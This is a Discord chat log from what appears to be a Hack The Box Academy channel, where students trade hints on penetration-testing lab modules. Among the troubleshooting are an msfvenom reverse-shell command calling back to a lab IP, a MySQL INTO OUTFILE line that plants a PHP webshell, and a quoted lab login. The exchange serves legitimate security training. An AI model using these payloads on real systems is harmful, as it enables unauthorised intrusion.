htb is not com

warm drift
#

been using .htb, .com just came out of my fingers subconsciously

#

how do I "use the IP from the specified resolver"?

acoustic owl
#

Then you only have to ask the specified NameServer (Target IP) for this domain. It knows this zone.

#

dig www.example.tld @10.10.10.10

warm drift
#

ok i'll do that

#

but what do I put in my etc hosts then?

coarse void
warm drift
#

oh ok

visual slate
#

i am working on Passwd, Shadow & Opasswd,but i can not find Will's credentials. who know where i can find Will's password

acoustic owl
# warm drift but what do I put in my etc hosts then?

What exactly do you want to do with an entry in /etc/hosts?

https://en.wikipedia.org/wiki/Hosts_(file)

The computer file hosts is an operating system file that maps hostnames to IP addresses. It is a plain text file. Originally a file named HOSTS.TXT was manually maintained and made available via file sharing by Stanford Research Institute for the ARPANET membership, containing the hostnames and address of hosts as contributed for inclusion by me...

visual slate
narrow solar
coarse void
warm drift
acoustic owl
warm drift
acoustic owl
warm drift
#

i found a nameserver does the system resolve that if main domain IP is already in resolve.conf?

acoustic owl
#

Resolver method?
No idea what you mean. You have to ask the authoritative server (Target IP) directly in any case. Only he knows the zone and can answer you.

#

Of course you can reconfigure your system. But then it will ask for this host for each name resolution.
But it is not a recursive resolver and therefore cannot resolve other names than inlanefreight.htb.

dusk torrent
warm drift
acoustic owl
#

You just need to understand how DNS works. It's really not difficult.

fathom pendant
frigid needle
#

Idk how to start

#

I opened my desktop

#

and am trying to figure it out LOL

compact patrolBOT
frigid needle
#

😮

#

yu

#

ty

dusk torrent
fathom pendant
dusk torrent
#

And I couldn't figure it out

novel shoal
#

Hello, I need help on module Attacking Common Applications: Exploiting Web Vulnerabilities in Thick-Client Applications

I have done follow the example but on the last part after i modify code to do sql injection I can't Login, It seems like the Login button is not working or something, I also tried to use cred from example to Login but it doesn't work too I don't know why. please help prayge
https://academy.hackthebox.com/module/113/section/2164

#

This is what i modified on User.java

public User(int uid, String username, String password, String email, Role role) {
    this.uid = uid;
    this.username = username;
    this.password = password;
    this.email = email;
    this.role = role;
}
public void setPassword(String password) {
    this.password = password;
  }
acoustic owl
# novel shoal Hello, I need help on module Attacking Common Applications: Exploiting Web Vulne...

00:00 - Intro
02:10 - Using wget to recursively download files off an annonymous FTP Server
06:00 - Attempting to execute the Java Thick Client, then switching to Java version 8 and trying again
08:00 - Seeing the Thick Client makes some DNS Requests, make the DNS Request resolve and attempt to intercept with Burp
11:00 - BurpSuite failed us, us...

▶ Play video
vital adder
# novel shoal This is what i modified on User.java ```java public User(int uid, String usernam...
worn matrix
#

can someone tell me,why it doesnt ask for a password?i cant continue my fundamentals

#

i run this on my computer,in oracle

worn matrix
#

Somneone help me?why i cant establish and SSH connection from VirtualBox with ubuntu?I can only through the site's workstation?Ubuntu doesnt ask for the password and i get stuck

worn matrix
#

nopp

fringe timber
#

it's suppose to be htp-student@10.129.30.211?

vital adder
#

try scanning port 22 on that machine just confirm you can connect

vital adder
worn matrix
#

htb* still doesnt work.didnt know,ok i ll read

candid gale
vital adder
candid gale
#

I've report they said they can't help me

#

Really frustrating since I just transcribed this guy script (changing the victims IP and msfvenom shellcode) and it's literally the same as mine...

candid gale
#

Sorry

vital adder
candid gale
#

I mean about my error. They didn't even look the video or my exploit

vital adder
raven locust
#

im finding password attacks one of the more frustrating modules, i’m not sure when htb wants me to use their wordlist or rockyou or something else entirely

acoustic owl
red kraken
#

Any good crypto player looking for a ctf team to join?

vital adder
rich wraith
#

Am I the only one who has completed several modules and feels like I don't know anything? Is this normal?

rich wraith
#

yeah

#

and I use it

sly kelp
lusty thicket
#

no

rich wraith
orchid pine
#

This rdp foot hold is ass is there anything i can do to connect my machine to access rhe rdp network this live engagement on shell and payloads

modern island
#

Hi. I'm having trouble configuring SELinux to deny access to a file. I have learned about compiling .te files, trying to make my custom labels, trying to reuse already used ones. Any help?

river token
#

AD Enumeration & Attacks - Skills Assessment Part I - The webserver crashes trying to upload files such as chisel? Am i working in the right direction?

silver mesa
river token
silver mesa
#

Not getting it clearly, so can you say which question are you trying

river token
#

last question

#

Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

#

trying to get chisel on the webserver so that i can run more tools to proceed

#

If that is the right weay to go

silver mesa
#

Do post exploitation in svc_sql user using mimikatz and grab way to DC

orchid pine
thorn urchin
modern island
candid gale
modern island
#

Oh wait, sorry. It just generates the payload as python format

#

Do you know if the target machine is little-endian or big-endian?

candid gale
#

Little

#

That's the pack for

#

It enters on the JMP ESP also

#

Reach the padding and then the shellcode.

#

But I got no remote shell

modern island
#

# msfvenom -p 'windows/shell_reverse_tcp' LHOST=10.10.15.198 LPORT=1234 -f 'python' -b '\x00\0x0A\0x0D'

Here, why are the other bits 0x0A and 0x0D but the x00 is not 0x00?

candid gale
#

Mmm let me check 😂😭

#

Bro

#

I might have dislexia

#

Thank you

modern island
#

No problem if it worked :D

candid gale
#

Gonna check, but definitely it's gonna work

rustic sage
#

Hello! Can I be admin here and get paid?

thorn urchin
rustic sage
#

Ok

#

But you are not even owner or admin or mod tho?

lusty thicket
thorn urchin
#

this channel is for module discussion only

river token
#

AD Enumeration & Attacks - Skills Assessment Part I - I have the admin ntlm hash and just need to pivot to the machine, but pivot methods keep failing

#

any hints to use the correct pivot method to get the final flag on the DC desktop?

candid gale
#

It worked 😂

pine galleon
thorn urchin
#

if you really need to contact admins just tag the serious rule breaker role

pine galleon
#

^^

modern island
pine galleon
#

also true

candid gale
silver mesa
river token
silver mesa
#

have you solved all pervious question ?

river token
#

i was able to use xfree to get to ms01 with that method

silver mesa
sly kelp
#

Can I dm someone about Pivoting and Tunneling module
Rdp and Socks Tunneling with SocksOverRDp

I am unable to see if it is lab issue or skill issue

rich wraith
#

intro to Active Directory module, I am doing the lab and I cant connect to the windows server with RDP

rich wraith
#

i did it

#

but nothing happened

sly kelp
#

Try remmina

#

For rdp

rich wraith
#

its good now, thanks 😄

#

I got these errors with xfreeRDP

tight mesa
#

hello y'all, anyone who have completed the Attacking common services lab easy, cuz I'm stuck, I found the password to the user and got access to the website but I'm struggling to upload a webshell (I guess this is the best way to grab the flag......)

#

although I guess the other way is thru sql but not sure

river token
fickle fiber
#

hey I'm doing the medium lab for "footprinting" and I'm on the RDP part trying to connect to the database but apparently I need to run the Server Management Studio as a privileged user? I'm a little lost

candid gale
# candid gale Yeah, now I got the connection on my local nc but can't interact and then it clo...

I managed to solve this.
Just keep trying doing the shellcode in msfvenom, it gives with the same arguments 3 different shellcodes (using encoders because of the bad chars).
Firstone get connection to netcat but no interactive shell.
Second one didn't even get a connection.
Third one get connection and shell.

Is this normal? Gotta always try several times same arguments on msfvenom? Or I'm missing something? I've literally press up and resend the same msfvenom command.

tight mesa
#

anyone willing to help with easy lab from attacking common services..!!!

odd tendon
#

Question, in the ATTACKING COMMON APPLICATIONS module for the Exploiting Web Vulnerabilities in Thick-Client Applications box, where do they get the IP address for this command from?

echo 10.10.10.174 server.fatty.htb >> C:\Windows\System32\drivers\etc\hosts

lusty thicket
#

which you can use to get the credentials of the server administrator

candid gale
odd tendon
fathom pendant
#

Tun0 is also in the pwnbox

#

It will always be the 10.10.x.x ip

odd tendon
fathom pendant
#

No idea about that one m8

odd tendon
tight mesa
#

anyone can give me a hint, with easy lab from attacking common services, I got access to mysql but can't find where to write the webshell, reading the forum I saw some comments regarding the possibility to write the webshell uder C:\xampp\htdocs\backdoor.php, but can't login via RDP, I'm completelly STUCK

fathom pendant
#

C:\xampp\htdocs\ is the xampp webroot

tight mesa
#

ok.

fathom pendant
#

Reread the attacking sql section it tells you how to do so

tight mesa
#

I read it but don't understand how to use SELECT ... INTO OUTFILE statement with LOAD_FILE() works...

#

I know mysql is running over Windows but can't find xampp\htdocs\ in the database unless I'm completely LOST

thorn urchin
#

you dont find it in the database

#

review the section again about into outfile

tight mesa
#

means I can write a command direcly in the database without a path?

thorn urchin
#

no

#

might need to take a step back and review how databases work cause you seem to have some odd misconceptions

tight mesa
#

what exactly do you recommend to review about databases?

#

or module to review?

thorn urchin
tight mesa
#

ok., ty

thorn urchin
#

id recommend setting up your own little mysql database so you can play around with it

dreamy solar
#

Hello

#

I need help for Authority ! Where is the password for configuration password ? I search but I don't see

thorn urchin
#

this is for module discussion

#

to access the rest of the server

sleek urchin
thorn urchin
tight mesa
#

ty but i prefer to understand the things how works and do it manually

thorn urchin
#

understanding the content and the lesson is more important than just answering the question correctly

tight mesa
#

agreed

sleek urchin
thorn urchin
#

otherwise youll just get stuck as a skid forever

fathom pendant
#

The point of the lesson is to learn how to do things in the event the --os-shell doesn't work

thorn urchin
#

that too

fathom pendant
#

And being able to actually control the commands rather than assume something works

thorn urchin
#

Im like one of the biggest advocates of think smarter not harder in here, but the smarter thing is to learn what you're doing first

pearl flint
#

guys if someone can explain me why in Password attacks medium lab:

spoiler>>>>
|| I can connect from ssh as dennis and as root with same private key i really dont understand this concept i tried searching google but to no avail.||

fathom pendant
thorn urchin
fathom pendant
#

It's just shared/reused credentials

pearl flint
lusty thicket
pearl flint
#

ye i got it now thanks guys!

lusty thicket
#

^

tight mesa
#

@thorn urchin can I DM?

thorn urchin
#

busy at work

tight mesa
#

ok., no worries

#

ty btw

#

ok., @thorn urchin I understood your comment but now I got a different probem, the result of my webshell is not shown in the browser

tight mesa
dense badge
#

Im doing password mutations, Im running into this error that I can't find online

#

ope and I cant post it

analog dock
#

Verify your acc

dense badge
#

It gets stuck on that every time

dense badge
#

nevermind

#

thats just the end of the file

#

I didnt not think it was gonna get throguh 94k words in 10 sec

jade shoal
#

I'm stuck on this as well - it's the only part I'm missing from this module :P

fickle fiber
lusty thicket
#

there’s ||sa|| credentials you just have to look 😉

fickle fiber
#

net user tells me we have

Administrator            alex                     DefaultAccount
Guest                    WDAGUtilityAccount
#

I tried using the sa password for the admin user but that did not work for me

#

I reckon the @ delimits the end of the password, right?

lusty thicket
#

||run ssms as admin|| then use the credentials you found

fickle fiber
#

fvck that was the problem then

#

many thanks dude @lusty thicket

lusty thicket
dense badge
#

Im doing the mutations password challange, and I have done the password file they provided with the custom rule file they provided, ran everything against the ftp server and got nothing, and to make sure, I used grep aswell to look for "Pwn3d!"

#

do I have to change the default username to something other than "sam:

wooden wing
#

Hi everybody

high reef
#

i'm doing Pivoting, Tunneling and Port forwards module . screenshot of the question i'm doing. I'm having issues with running this command python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 i get this error on the pivot host machine

#

nvm figured it out however the flag i'm submitting says it wrong smh

tight mesa
#

what could be wrong in this command SELECT "<?php system($_REQUEST[‘cmd’]) ?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php'; .....???

hexed void
#

Hi guys!

Am I looking at the wrong thing?

gloomy bramble
hexed void
#

The answer seems like System Logging Service

gloomy bramble
tight mesa
#

can I DM?

gloomy bramble
hexed void
#

Got it, its Notify

golden arch
#

can i pm someone.. im stuck in Advanced File Disclosure of Web Attacks!

tidal mango
rich perch
#

Hello! Can I get a nudge on the Documentation and Reporting Practice Lab? I've been stuck for two days on question 1. I have so many different users and passwords but none of them get me on to the DC.

tidal mango
rich perch
tidal mango
rich perch
# tidal mango What have your tried?

mix and matching a bunch of different creds
usernames: asmith, abuoldercon, admin, Administrator, solarwindsmonitor, sqldev, sqlprod, dhawkins, clusteragent
passwords: Welcome1, Welcome123!, Bacon1989, diamond1

tidal mango
rich perch
umbral fulcrum
#

Hey guys, I'm in module "Using Web Proxies" :: "Skills Assessment - Using Web Proxies"
Question 3:
"Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload"

I don't get what am I suppose 2 send the intruder, the request?!
if so what am I suppose 2 mark as my target??

can someone please clarify me ??

rustic sage
#

@spring tundra

spring tundra
vital adder
umbral fulcrum
#

the cookie is in the response ...

rustic sage
vital adder
# spring tundra ??

that dumb dumb ask to be admin yesterday but didn't get meme on enough so he's here for round 2 🤣

vital adder
wooden wing
#

good morning everyone, I've been stuck for days on the Attacking common services - Hard module, I'm literally going crazy I just can't get started, can anyone help me?

vital adder
#

hint so some enum on the servers that are running on the target (@wooden wing if you didn't catch this)

spring tundra
vital adder
#

that would be nice 🙏

umbral fulcrum
vital adder
#

it's a cookie, doesn't matter what you send you will always get the same response code (for this part) look at the length

vital adder
#

all of them?

umbral fulcrum
#

yes

vital adder
#

and for the payload you use something like alphanum-case.txt right?

umbral fulcrum
#

exactly this 1

vital adder
#

can you send a screenshot of your intruder and one of the request

wooden wing
#

@vital adder dm

timber phoenix
#

so quiet

#

anyone there

twilit wharf
#

Module: NTLM Relay. I am stuck on the 3rd question of the skill assessment. Can anyone give me a hint?

timber phoenix
#

what is that

jade shoal
#

I'm stuck on "Detecting Windows Attacks with Splunk", and the only question in module I can't answer is the Detecting Beaconing Malware section, " what is the most straightforward Splunk command to pinpoint beaconing". I've tried so many things that makes sense to me, but none of them are the answer. Any tips?

jade shoal
warm drift
#

can anyone help in ICMP tunneling section of the Pivoting module I get this error on pivot host

./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36' not found (required by ./ptunnel-ng) ./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)

when I try running this command : sudo ./ptunnel-ng -r10.129.82.159 -R22 to start the server

bleak mural
#

Alright, I give up. Attacking Common Services - Medium lab. Everyone is saying it’s super easy but I can’t find a user name anywhere. I found the obscure ||30021 port|| , did a deep dive into that port only and didn’t find a thing. Any help would be greatly appreciated. Really quite disappointed in myself on this one 😞

warm drift
acoustic owl
acoustic owl
warm drift
# acoustic owl What is not working? What have you tried?

tried placing "nameserver IP" in resolv.conf, dig NS inlanefreight.htb only gives me ns.inlanefreight.htb i add it into subbrute resolv.conf, I've tried adding "IP Inlanefreight.htb" into etc.hosts etc... i've tried aa lot of things actually

bleak mural
acoustic owl
warm drift
acoustic owl
#

this configuration file does not generate any IP at all.
It only specifies which resolver your system should request

warm drift
#

my system keeps putting this in

#

so I think it's affecting subbrute tool

acoustic owl
deep apex
#

is there any channel for hailstorm labs ?

acoustic owl
#

As far as I know, the Business Labs do not have their own channel.

deep apex
#

oh okay! Thanks @acoustic owl

twilit gull
#

Hi guys, I'm in broken authentication module. I have obtained valid user name and got the password by bruteforcing. I got the cookie too but I'm unable to decode it. URL -> Base64 then it gives the string, tried magic with code chef the text but no use.

#

Do I need to find the password for admin account too or support account is enough? I got the cookie decoded and encoded to but no use.

quick cairn
#

any hint for the Attacking Enterprise Networks module section External Information Gathering question 3 "What is the FQDN of the associated subdomain?" i have no idea which FQDN for which subdomain do i need

barren sentinel
#

so I am like a new leaf here, but can anyone tell me why is hacking enjoyable? and how do you start it? I know i can find answers from google but i feel it would be better to hear it from a subject focused community

acoustic owl
barren sentinel
#

👍

barren sentinel
#

if you dont mind sharing some personal experience?

acoustic owl
#

I was and am simply curious about what works or does not work

barren sentinel
#

ahh i see

#

what type of challenges did you face at the beginning in this coding journey

#

with me coding has always been a dozzy type of feeling but the outcome was always enjoyable

acoustic owl
#

Just do what you enjoy. Then learning is relatively easy

rich perch
#

hello! I just finished the Password Attacks module but I'm still kinda confused on how Pass the Hash attacks actually work. I don't think the module explained that well enough, does anyone know any articles that go more in-depth?

brave prawn
#

Hey guys, I have a question. Can file upload vulnerability be exploited if the webserver renames .php file to .png? I mean, when i curl, it downloads file instead of executing code. Or does it mean that the webserver doesnt have needed configuration for executing php code?

fickle fiber
#

If I do all of the modules in silver subscription and decide not to renovate the subscription next year I still own the modules right? I'll keep access to whatever modules I've started or completed, is that correct?

brave prawn
acoustic owl
sly kelp
fickle fiber
brave prawn
sly kelp
#

That's something need to research

acoustic owl
shy crystal
#

Could someone help me on the third question for the crackmaexec skill assessment. I currently have the ||james|| creentials and own the SQL01 domain. What am I missing? I saw that maybe is related to ||a service account but I sprayed the credentials I own|| without any results.

dawn condor
#

Hi, stuck on SQLMap skill assessment final_flag. can I dm someone? 🙏

frank vine
#

Hi everyone, if I am in the domain admin group which is in administrators group, why do I get accessed denied when trying to read an admin file? Do I have to do something with the ACL or just add my user to local admin group? I'm on the windows priv esc module btw.

fickle fiber
#

I'm doing the password attacks module and bruteforcing ssh is taking forever with both crackmapexec and hydra, am I using the wrong tools? it's doing 1 attempt every few seconds

frank vine
shy crystal
tender viper
#

I'm stuck on the Active Subdomain Enumeration and can't seem to figure out the Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer. question!??

I keep getting the ** server can't find inlanefreight.htb: NXDOMAIN

lusty thicket
mortal basin
tender viper
lusty thicket
tender viper
quasi wave
#

hi I have determined that I need to use some NSE script on port 80 to get the flag

#

however, I have tried several scripts and have had no luck

#

including discovery script

#

this is for Nmap Scripting Engine section of Nmap module

lusty thicket
quasi wave
#

sorry I didn't clarify

#

hold on I'll be right back

#

ok back

quasi wave
#

I have tried extensive scanning on port 80 and 31337 and 443. I haven't gotten very good results. I have tried several scripts

tender lake
#

I'm a little bit stuck on the skill assessment for File inclusion, I have managed to get to the point where I can read a file and execute code but the response does not show in its entirety.
Can anyone assist me with this?

#

The burp response caps out at 110 lines

lusty thicket
quasi wave
#

So ok so I really gotta look at output from scripts

lusty thicket
quasi wave
#

Ok got it

neon ingot
#

So can do a lot

#

Nmap

autumn pilot
rustic sage
#

After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user? hello, i need hint on this because i spent hours on this, i connected to htb-student but i did not find the servicesid

#

this under windows defense and attacks

terse sedge
#

Hello, I'm working on HTB Academy-Login Brute Forcing-Skills Assessment-Website, been trying for over a week. Also, did something change, because I've read about a Harry Potter themed one that I never saw. If the answer relies on that, I haven't tried it. I've tried the ||Bill Gates|| themed approach using custom Usernames & Passwords. Can anyone point me in the right direction please?

acoustic owl
latent flame
#

Hello everyone! Please someone explain to me. Why does it make sense to create new VPS with all the tools for each client? In HTB it's also advisable to have a new pwnbox for each assignment. Why not having one machine for all the operations is not an option? If it's for the client's data (still not sure why), then does having multiple disposable VMs solve this issue as well?

fathom pendant
#

It also helps keep data clean if you don't have to parse which creds.list is for which client

tender viper
#

I'm stuck on the Active Subdomain Enumeration and can't seem to figure out the Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. question!??

velvet lily
#

Hello all, for the KERBEROS ATTACKS module at AS-REPRoasting from Linux i can't solve the question. Most likely i am doing something wrong, but i can't RDP into the box, or even usign directly impacket's GetNPUsers tool, still i am getting an error. Something with route not found, and i did added the commonname of the machine in etc/hosts.

tender viper
fathom pendant
#

Honestly you're probably overthinking it

tender viper
#

@fathom pendant Once I added the names server to the etc/hosts , I ran the nslookup -type=any -query=AXFR TARGET (ns) and results finally came back. Is the serial number that it displays suppose to be the answer?

fathom pendant
#

Nope

#

Think about what a zone is

#

And not what a subdomain is

velvet lily
latent flame
thorn urchin
#

id use more diff snapshots for that instead

#

but yes diff VMs for different purposes in general

echo roost
#

Oh I see it's the user from question 1's hash that you have to crack. That question needs to be reworded.

pure osprey
#

Is it just me, or should Attacking Common Services - Medium and Attacking Common Services - Easy be swapped? The medium lab is far easier imo...

thorn urchin
pure osprey
#

Doing hard rn, will confirm or reject 😆

paper flint
#

Hey Im really new to this. Im trying to do the very first meow box but my ping cmd isnt working

lusty thicket
paper flint
valid forge
#

I have a question on the final question of the Hacking WordPress skills assessment. Is anyone available to DM?

valid forge
#

Disgregard

pure osprey
thorn urchin
#

¯_(ツ)_/¯

pure osprey
#

I guess if you're familiar with the exploited toolset it'd be like muscle memory...

final maple
#

Has anyone done "Kerberos Attacks - Unconstrained Delegation - Computers - Q2: Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt"? I got the rc4 hash for DC01$ but when I try to read the directory with the flag, I keep getting errors. I used the printspool exploit to get the dc01 and then got the hash for that account through mimikatz. Then, I ran the hash through Rubeus again and tried to search the flag directory, but keep getting "Permission Denied"

wooden rapids
#

im working through attacking enterprise networks - web enumeration and exploitation, at the the end of the section for ir.inlanefreight.local it says: "From here, we could attempt to dump all data from the status database and record yet another finding, SQL Injection.". in a real engagement would you attempt to dump databases or is this a matter of being inscope or not?

#

i guess you would for creds

final maple
golden wagon
#

Good morning! I would like to prepare for my local CTF competition in Mobile Security / Programming / Reverse Engineer / Forensic field, are there any relevant modules would you like to recommend?

final maple
#

Search for those topics in the module search bar

fringe shell
acoustic owl
earnest junco
#

`PS C:\Users\htb-student> Get-ADUser -Filter "Name -eq 'Robert'”
PS C:\Users\htb-student> Get-ADUser -Filter "Name -eq 'Mtanaka'”

DistinguishedName : CN=MTanaka,CN=Users,DC=greenhorn,DC=corp
Enabled : True
GivenName : Mori
Name : MTanaka
ObjectClass : user
ObjectGUID : c19e402d-b002-4ca0-b5ac-59d416166b3a
SamAccountName : MTanaka
SID : S-1-5-21-1480833693-1324064541-2711030367-1603
Surname : Tanaka
UserPrincipalName :`

how do i get Robert's surname ?
if he is not under DC:greenhorn or DC=corp

acoustic owl
#

Try Get-ADUser -Filter "GivenName -eq 'Robert'”

earnest junco
#

it works...Thanks

golden wagon
acoustic owl
# golden wagon Thank you so much! Right now my VIP membership for academy.htb is going to be ex...

There is no VIP membership for the Academy.
In the Academy you can have the silver annual subscription, then you get an exam voucher and can do all modules up to Tier II.
Or you can buy cubes and unlock your modules with them.
You can buy the cubes cheaper with a subscription. Then you pay a monthly amount and get cubes so that you can unlock modules.

The Vip or Vip+ access is only available for the main platform.

golden wagon
#

Anyway if there is any promotion or discount like I have seen in June, it would be great 🥰

acoustic owl
#

Such actions are very rare. Maybe there will be such action when HTB publishes the new certificate for SOC Analyst.

round gale
#

working on the pivoting and tunneling section, the diagram states that the port 8080 in the Ubuntu server is configured to forward traffic to port 8000 in the attack host, so shouldnt the top left red arrow flow from right to left?

acoustic owl
rustic sage
#

Hey, payloadbunny, what is the route you recommend to complete the CPTS?

golden wagon
fresh compass
#

Hi! In the Active Directory Enumeration & Attacks module, AD Enumeration & Attacks - Skills Assessment Part I section I am really lost in the question 6. I have the user and I am trying to use everything I know but I cannot find the credentials. Any hint of what tool should I use or the section where I should look deeper? Thanks

acoustic owl